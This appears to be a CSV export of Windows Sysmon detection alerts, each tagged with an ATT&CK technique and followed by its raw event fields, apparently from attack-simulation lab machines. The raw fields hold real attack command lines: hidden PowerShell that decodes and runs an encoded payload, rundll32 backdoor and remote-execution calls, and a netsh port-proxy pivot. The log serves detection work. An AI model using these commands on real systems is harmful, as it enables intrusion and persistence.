0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
9809
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:26:52.356
365ABB72-AF8C-5CC8-0000-001003361900
2484
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-2586-5CC9-0000-0020E7030000
0x3e7
0
System
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-AF8B-5CC8-0000-0010AC1B1900
3872
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
311382
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-07-09 22:05:55.880
747F3D96-94C3-5F07-0000-001080B40100
3096
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-1350-5F08-0000-0020E7030000
0x3e7
0
System
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
00000000-0000-0000-0000-000000000000
628
?
?
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1,"
1
5
4
1
0
0x8000000000000000
311396
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-07-10 10:20:34.877
747F3D96-40F2-5F08-0000-0010D8A92C00
3304
C:\Windows\System32\rdpclip.exe
10.0.17763.1131 (WinBuild.160101.0800)
RDP Clipboard Monitor
Microsoft® Windows® Operating System
Microsoft Corporation
rdpclip.exe
rdpclip
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-94CD-5F07-0000-0020ABBF0300
0x3bfab
1
Medium
SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206
747F3D96-1350-5F08-0000-001014C50000
824
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243558
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.452
747F3D96-9F69-5E75-0000-001035972000
1388
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"
1
5
4
1
0
0x8000000000000000
1966403
Microsoft-Windows-Sysmon/Operational
PC01.example.corp
2019-03-19 20:49:28.058
365ABB72-55D8-5C91-0000-001060C90700
3648
C:\Windows\System32\sdbinst.exe
6.0.7600.16385 (win7_rtm.090713-1255)
Application Compatibility Database Installer
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB "
C:\Windows\System32\
EXAMPLE\user01
365ABB72-5417-5C91-0000-002035340300
0x33435
1
High
MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F
365ABB72-551C-5C91-0000-001030590500
2704
C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe
"C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"
",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1,"
1
5
4
1
0
0x8000000000000000
9809
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-04-30 20:26:52.356
365ABB72-AF8C-5CC8-0000-001003361900
2484
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-2586-5CC9-0000-0020E7030000
0x3e7
0
System
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-AF8B-5CC8-0000-0010AC1B1900
3872
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1,"
1
5
4
1
0
0x8000000000000000
4949
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:58.357
747F3D96-6646-5D3F-0000-0010A7398B00
3868
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1,"
1
5
4
1
0
0x8000000000000000
421227
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.776
747F3D96-75D1-5F8B-0000-001088C23300
2784
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3,"
3
5
4
3
0
0x8000000000000000
17590
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 01:29:00.318
365ABB72-19E0-5CDA-0000-001006711000
1932
C:\Windows\System32\mshta.exe
IEWIN7\IEUser
tcp
false
false
10.0.2.16
IEWIN7
49168
false
10.0.2.17
55683
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1,"
1
5
4
1
0
0x8000000000000000
421227
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.776
747F3D96-75D1-5F8B-0000-001088C23300
2784
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1,"
1
5
4
1
0
0x8000000000000000
421227
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-17 22:53:05.776
747F3D96-75D1-5F8B-0000-001088C23300
2784
C:\Windows\System32\cmd.exe
10.0.17763.592 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1
C:\
MSEDGEWIN10\Administrator
747F3D96-75D0-5F8B-0000-0020A8A83300
0x33a8a8
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-75D1-5F8B-0000-00101DAB3300
2228
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt ),1,"
1
5
4
1
0
0x8000000000000000
56509
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-11-03 13:51:56.380
747F3D96-DB7C-5DBE-0000-0010CF6B9502
5004
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt
C:\Windows\system32\
MSEDGEWIN10\sqlsvc
747F3D96-CE3B-5DBE-0000-00201ED50100
0x1d51e
0
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-CE42-5DBE-0000-0010EE430200
3936
C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
"c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3,"
3
5
4
3
0
0x8000000000000000
589975
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-12-15 15:00:14.470
747F3D96-CF4B-5FD8-0000-00101AD58700
6976
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10
50008
false
10.0.2.17
MSEDGEWIN10CLONE
49666
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1,"
1
5
4
1
0
0x8000000000000000
4948
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:58.355
747F3D96-6646-5D3F-0000-001029398B00
6760
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
17589
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 01:29:04.293
365ABB72-19E0-5CDA-0000-001006711000
1932
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
C:\Windows\System32\mshta.exe -Embedding
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-19E0-5CDA-0000-0020CE701000
0x1070ce
0
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-965E-5CDA-0000-0010AF760000
596
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1,"
1
5
4
1
0
0x8000000000000000
17589
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 01:29:04.293
365ABB72-19E0-5CDA-0000-001006711000
1932
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
C:\Windows\System32\mshta.exe -Embedding
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-19E0-5CDA-0000-0020CE701000
0x1070ce
0
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-965E-5CDA-0000-0010AF760000
596
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
17589
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-14 01:29:04.293
365ABB72-19E0-5CDA-0000-001006711000
1932
C:\Windows\System32\mshta.exe
11.00.9600.16428 (winblue_gdr.131013-1700)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
C:\Windows\System32\mshta.exe -Embedding
C:\Windows\system32\
IEWIN7\IEUser
365ABB72-19E0-5CDA-0000-0020CE701000
0x1070ce
0
High
SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A
365ABB72-965E-5CDA-0000-0010AF760000
596
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
578497
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-04-20 20:32:55.351
747F3D96-3A77-607F-0000-00105DD17600
7280
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-0433-607F-0000-002073600700
0x76073
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-04C3-607F-0000-0010F13B1E00
2532
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243556
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.441
747F3D96-9F69-5E75-0000-00102F962000
6136
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile ),1,"
1
5
4
1
0
0x8000000000000000
578497
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2021-04-20 20:32:55.351
747F3D96-3A77-607F-0000-00105DD17600
7280
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-0433-607F-0000-002073600700
0x76073
1
High
SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
747F3D96-04C3-607F-0000-0010F13B1E00
2532
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243556
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.441
747F3D96-9F69-5E75-0000-00102F962000
6136
C:\Windows\System32\rundll32.exe
